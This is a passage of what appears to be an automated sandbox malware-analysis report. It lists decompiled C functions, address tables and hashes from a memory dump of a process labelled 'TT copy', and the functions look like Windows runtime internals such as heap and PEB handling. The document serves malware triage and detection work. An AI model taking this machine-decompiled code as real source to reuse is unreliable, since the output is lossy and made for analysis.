                                                                                                            0x010a386e
                                                                                                            0x010a386e
                                                                                                            0x010a3871
                                                                                                            0x010a3873
                                                                                                            0x010a3873
                                                                                                            0x010a3868
                                                                                                            0x00000000
                                                                                                            0x010a3868
                                                                                                            0x010a3821
                                                                                                            0x010a3826
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a3828
                                                                                                            0x010a382a
                                                                                                            0x010a3841
                                                                                                            0x00000000
                                                                                                            0x010a3841

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 438b9bbee5e88525bcf8797851aa52cfc51b33596e7d3276bcb01242aa8f7412
                                                                                                            • Instruction ID: 352e031c79360c579765eb999d32f72bfd7443ba65011dcd72a464fd8f6f9917
                                                                                                            • Opcode Fuzzy Hash: 438b9bbee5e88525bcf8797851aa52cfc51b33596e7d3276bcb01242aa8f7412
                                                                                                            • Instruction Fuzzy Hash: EB0126B29027119BC3779B9ED900E2ABBE6FF81A6075540A9E9C58F205CB30C800C7C0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109002D Relevance: .1, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0109002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01087D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01087D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01087D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01087D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                            0x01090032
                                                                                                            0x01090037
                                                                                                            0x01090043
                                                                                                            0x010d4b3a
                                                                                                            0x01090049
                                                                                                            0x01090049
                                                                                                            0x01090049
                                                                                                            0x0109004e
                                                                                                            0x01090053
                                                                                                            0x010d4b48
                                                                                                            0x010d4b5a
                                                                                                            0x010d4b4a
                                                                                                            0x010d4b53
                                                                                                            0x010d4b53
                                                                                                            0x010d4b5f
                                                                                                            0x00000000
                                                                                                            0x010d4b61
                                                                                                            0x00000000
                                                                                                            0x010d4b61
                                                                                                            0x01090059
                                                                                                            0x01090059
                                                                                                            0x01090060
                                                                                                            0x010d4b6f
                                                                                                            0x010d4b6f
                                                                                                            0x01090069
                                                                                                            0x010d4b83
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4b90
                                                                                                            0x010d4b9b
                                                                                                            0x010d4b9b
                                                                                                            0x010d4ba4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4baa
                                                                                                            0x00000000
                                                                                                            0x0109006f
                                                                                                            0x0109006f
                                                                                                            0x00000000
                                                                                                            0x0109006f
                                                                                                            0x01090069

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                            • Instruction ID: 562d6f56d89762546f43e622472e7a0786e69fb2fb5c1f5f9bcb995a43647093
                                                                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                            • Instruction Fuzzy Hash: 2911C232205781CFEB62AB28C954B3937E8AB91764F1900E0FDD4C7A96D339D841C750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0107766D Relevance: .1, Instructions: 54COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E0107766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0109F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0109F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01084620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                            0x01077672
                                                                                                            0x0107767f
                                                                                                            0x01077689
                                                                                                            0x010776de
                                                                                                            0x010776de
                                                                                                            0x0107768b
                                                                                                            0x01077691
                                                                                                            0x01077693
                                                                                                            0x01077697
                                                                                                            0x00000000
                                                                                                            0x01077699
                                                                                                            0x010776a8
                                                                                                            0x00000000
                                                                                                            0x010776aa
                                                                                                            0x010776ad
                                                                                                            0x010776b1
                                                                                                            0x00000000
                                                                                                            0x010776b3
                                                                                                            0x010776b3
                                                                                                            0x010776b5
                                                                                                            0x010776ba
                                                                                                            0x010776bc
                                                                                                            0x010776bc
                                                                                                            0x010776c0
                                                                                                            0x00000000
                                                                                                            0x010776c2
                                                                                                            0x010776ce
                                                                                                            0x010776ce
                                                                                                            0x010776c0
                                                                                                            0x010776b1
                                                                                                            0x010776a8
                                                                                                            0x01077697
                                                                                                            0x010776d9

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                            • Instruction ID: 39e666a7da414dbee33df42921a089aaf507c0f36234626bd7a6be6819a54088
                                                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                            • Instruction Fuzzy Hash: 1601AC72B00119ABDB30DE5ECC55E9B7BEDEB886A0F244564BA48CB254DA30DD01C7A4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01069080 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E01069080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x11585ec;
				E01082280(_t48, 0x11585ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0107FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x115538c; // 0x77496828
					if( *_t84 != 0x1155388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x113f6e8);
						E010BD0E8(0x11585ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E011388F5(_t80, _t85, 0x1155388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x11586c0; // 0xc007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x11586b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01082280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E011388F5(0x11585ec, _t85, 0x1155388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E010AAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x115b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x11584c0;
																			if(_t82 >=  *0x11584c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01139063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0106922A(_t99);
										_t64 = E01087D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01138B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x11586c0; // 0xc007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x11586b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x11586bc;
													_t87 = 0x11586b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01069240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x11586c4;
												_t87 = 0x11586c0;
												L27:
												E01099B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E010BD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1155388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x115538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                            0x01069082
                                                                                                            0x01069083
                                                                                                            0x01069084
                                                                                                            0x01069085
                                                                                                            0x01069087
                                                                                                            0x01069096
                                                                                                            0x01069098
                                                                                                            0x01069098
                                                                                                            0x0106909e
                                                                                                            0x010690a8
                                                                                                            0x010690e7
                                                                                                            0x010690e7
                                                                                                            0x010690aa
                                                                                                            0x010690b0
                                                                                                            0x010690b7
                                                                                                            0x010690bd
                                                                                                            0x010690dd
                                                                                                            0x010690e6
                                                                                                            0x010690bf
                                                                                                            0x010690bf
                                                                                                            0x010690c7
                                                                                                            0x010690cf
                                                                                                            0x010690f1
                                                                                                            0x010690f2
                                                                                                            0x010690f4
                                                                                                            0x010690f5
                                                                                                            0x010690f6
                                                                                                            0x010690f7
                                                                                                            0x010690f8
                                                                                                            0x010690f9
                                                                                                            0x010690fa
                                                                                                            0x010690fb
                                                                                                            0x010690fc
                                                                                                            0x010690fd
                                                                                                            0x010690fe
                                                                                                            0x010690ff
                                                                                                            0x01069100
                                                                                                            0x01069102
                                                                                                            0x01069107
                                                                                                            0x0106910c
                                                                                                            0x01069110
                                                                                                            0x01069113
                                                                                                            0x01069115
                                                                                                            0x01069136
                                                                                                            0x0106913f
                                                                                                            0x01069143
                                                                                                            0x010c37e4
                                                                                                            0x010c37e4
                                                                                                            0x01069117
                                                                                                            0x01069117
                                                                                                            0x0106911d
                                                                                                            0x00000000
                                                                                                            0x0106911f
                                                                                                            0x0106911f
                                                                                                            0x01069125
                                                                                                            0x00000000
                                                                                                            0x01069127
                                                                                                            0x0106912d
                                                                                                            0x01069130
                                                                                                            0x01069134
                                                                                                            0x01069158
                                                                                                            0x0106915d
                                                                                                            0x01069161
                                                                                                            0x01069168
                                                                                                            0x010c3715
                                                                                                            0x0106916e
                                                                                                            0x0106916e
                                                                                                            0x01069175
                                                                                                            0x01069177
                                                                                                            0x0106917e
                                                                                                            0x0106917f
                                                                                                            0x01069182
                                                                                                            0x01069182
                                                                                                            0x01069187
                                                                                                            0x01069187
                                                                                                            0x0106918a
                                                                                                            0x0106918d
                                                                                                            0x0106918f
                                                                                                            0x01069192
                                                                                                            0x01069195
                                                                                                            0x01069198
                                                                                                            0x01069198
                                                                                                            0x01069198
                                                                                                            0x0106919a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c371f
                                                                                                            0x010c3721
                                                                                                            0x010c3727
                                                                                                            0x010c372f
                                                                                                            0x010c3733
                                                                                                            0x010c3735
                                                                                                            0x010c3738
                                                                                                            0x010c373b
                                                                                                            0x010c373d
                                                                                                            0x010c3740
                                                                                                            0x00000000
                                                                                                            0x010c3746
                                                                                                            0x010c3746
                                                                                                            0x010c3749
                                                                                                            0x00000000
                                                                                                            0x010c374f
                                                                                                            0x010c374f
                                                                                                            0x010c3751
                                                                                                            0x010c3757
                                                                                                            0x010c3759
                                                                                                            0x010c375c
                                                                                                            0x010c375c
                                                                                                            0x010c375e
                                                                                                            0x010c375e
                                                                                                            0x010c3761
                                                                                                            0x010c3764
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3766
                                                                                                            0x010c3768
                                                                                                            0x010c37a3
                                                                                                            0x010c37a3
                                                                                                            0x010c37a5
                                                                                                            0x010c37a7
                                                                                                            0x010c37ad
                                                                                                            0x010c37b0
                                                                                                            0x010c37b2
                                                                                                            0x010c37bc
                                                                                                            0x010c37c2
                                                                                                            0x010c37c2
                                                                                                            0x010c37b2
                                                                                                            0x01069187
                                                                                                            0x01069187
                                                                                                            0x0106918a
                                                                                                            0x0106918d
                                                                                                            0x0106918f
                                                                                                            0x01069192
                                                                                                            0x01069195
                                                                                                            0x00000000
                                                                                                            0x01069195
                                                                                                            0x00000000
                                                                                                            0x010c376a
                                                                                                            0x010c376a
                                                                                                            0x010c376a
                                                                                                            0x010c376c
                                                                                                            0x010c376c
                                                                                                            0x010c376f
                                                                                                            0x010c3775
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c3777
                                                                                                            0x010c3779
                                                                                                            0x010c3782
                                                                                                            0x010c3787
                                                                                                            0x010c3789
                                                                                                            0x010c3790
                                                                                                            0x010c3790
                                                                                                            0x010c378b
                                                                                                            0x010c378b
                                                                                                            0x010c378b
                                                                                                            0x010c3792
                                                                                                            0x010c3795
                                                                                                            0x00000000
                                                                                                            0x010c3795
                                                                                                            0x00000000
                                                                                                            0x010c3779
                                                                                                            0x010c3798
                                                                                                            0x00000000
                                                                                                            0x010c3798
                                                                                                            0x00000000
                                                                                                            0x010c3768
                                                                                                            0x010c379b
                                                                                                            0x010c379b
                                                                                                            0x010c3751
                                                                                                            0x010c3749
                                                                                                            0x00000000
                                                                                                            0x010c3740
                                                                                                            0x010691a0
                                                                                                            0x010691a3
                                                                                                            0x010691a9
                                                                                                            0x010691b0
                                                                                                            0x00000000
                                                                                                            0x010691b0
                                                                                                            0x01069187
                                                                                                            0x010691b4
                                                                                                            0x010691b4
                                                                                                            0x010691bb
                                                                                                            0x010691c0
                                                                                                            0x010691c5
                                                                                                            0x010691c7
                                                                                                            0x010c37da
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691cd
                                                                                                            0x010691d2
                                                                                                            0x010691d5
                                                                                                            0x01069239
                                                                                                            0x01069239
                                                                                                            0x010691d7
                                                                                                            0x010691db
                                                                                                            0x010691e1
                                                                                                            0x010691e7
                                                                                                            0x010691fd
                                                                                                            0x01069203
                                                                                                            0x0106921e
                                                                                                            0x01069223
                                                                                                            0x00000000
                                                                                                            0x01069205
                                                                                                            0x01069205
                                                                                                            0x01069208
                                                                                                            0x0106920c
                                                                                                            0x01069214
                                                                                                            0x01069214
                                                                                                            0x0106920c
                                                                                                            0x010691e9
                                                                                                            0x010691e9
                                                                                                            0x010691ee
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691f3
                                                                                                            0x010691e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01069134
                                                                                                            0x01069125
                                                                                                            0x0106911d
                                                                                                            0x0106914e
                                                                                                            0x010690d1
                                                                                                            0x010690d1
                                                                                                            0x010690d3
                                                                                                            0x010690d6
                                                                                                            0x010690d8
                                                                                                            0x00000000
                                                                                                            0x010690d8
                                                                                                            0x010690cf

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6499cd8405131daf6797e0261693536952657e3933b572f506648c5e00558328
                                                                                                            • Instruction ID: 4c549760b7a3072b17f7ae12da5bd4bcb5cab8d0b1f934eb93a6616f2dfdb153
                                                                                                            • Opcode Fuzzy Hash: 6499cd8405131daf6797e0261693536952657e3933b572f506648c5e00558328
                                                                                                            • Instruction Fuzzy Hash: EC01F472505200CFE3A99F18D840B117BEDFF41328F2180B6E5559BA92C370DC81CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010FC450 Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E010FC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E010A9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E010A95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E010A95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E010A95D0();
				return L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                            0x010fc458
                                                                                                            0x010fc45d
                                                                                                            0x010fc466
                                                                                                            0x010fc468
                                                                                                            0x010fc469
                                                                                                            0x010fc46a
                                                                                                            0x010fc46b
                                                                                                            0x010fc46e
                                                                                                            0x010fc46f
                                                                                                            0x010fc471
                                                                                                            0x010fc476
                                                                                                            0x010fc476
                                                                                                            0x010fc47c
                                                                                                            0x010fc47e
                                                                                                            0x010fc480
                                                                                                            0x010fc480
                                                                                                            0x010fc483
                                                                                                            0x010fc484
                                                                                                            0x010fc486
                                                                                                            0x010fc488
                                                                                                            0x010fc48f
                                                                                                            0x010fc491
                                                                                                            0x010fc493
                                                                                                            0x010fc493
                                                                                                            0x010fc48f
                                                                                                            0x010fc498
                                                                                                            0x010fc49e
                                                                                                            0x010fc4ad
                                                                                                            0x010fc4ad
                                                                                                            0x010fc4b2
                                                                                                            0x010fc4b4
                                                                                                            0x010fc4cd

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                            • Instruction ID: ef9577a9cb7ba12a0483aa83da01261dffded3ce89a2a63cbba8ce82d2b9f65e
                                                                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                            • Instruction Fuzzy Hash: 6E01967124050ABFE711AF69CD82EA2FBADFF54354F504529F2D442960CB31ECA0C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01134015 Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E01134015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01082280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01082280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11586ac);
					E0106F900(0x11586d4, _t28);
					E0107FFB0(0x11586ac, _t28, 0x11586ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0107FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                            0x0113401a
                                                                                                            0x0113401e
                                                                                                            0x01134023
                                                                                                            0x01134028
                                                                                                            0x01134029
                                                                                                            0x0113402b
                                                                                                            0x0113402f
                                                                                                            0x01134043
                                                                                                            0x01134046
                                                                                                            0x01134051
                                                                                                            0x01134057
                                                                                                            0x0113405f
                                                                                                            0x01134062
                                                                                                            0x01134067
                                                                                                            0x0113406f
                                                                                                            0x0113407c
                                                                                                            0x0113407c
                                                                                                            0x0113408c
                                                                                                            0x0113408c
                                                                                                            0x01134097

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1135b90b5560c68f0efcbc5a6f2da0a79a769fde6291d7c8d1b6757e4c588c23
                                                                                                            • Instruction ID: 2802f4d20e2c93889f25f98e10be5ae3259b30050c15f2a5e2b77e1974a1a8ce
                                                                                                            • Opcode Fuzzy Hash: 1135b90b5560c68f0efcbc5a6f2da0a79a769fde6291d7c8d1b6757e4c588c23
                                                                                                            • Instruction Fuzzy Hash: C9017C72601946BFD355BB7ACD80E93B7ACFF95660B000229F59887A11CB24EC11C6E4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0112138A Relevance: .0, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 61%
                                                                                                            			E0112138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x115d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E010AFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01087D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010AB640(E010A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                            0x0112138a
                                                                                                            0x0112138a
                                                                                                            0x01121399
                                                                                                            0x011213a3
                                                                                                            0x011213a8
                                                                                                            0x011213aa
                                                                                                            0x011213b5
                                                                                                            0x011213bb
                                                                                                            0x011213c3
                                                                                                            0x011213c6
                                                                                                            0x011213c9
                                                                                                            0x011213d4
                                                                                                            0x011213e6
                                                                                                            0x011213d6
                                                                                                            0x011213df
                                                                                                            0x011213df
                                                                                                            0x011213f1
                                                                                                            0x011213f2
                                                                                                            0x011213f4
                                                                                                            0x011213f9
                                                                                                            0x0112140e

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
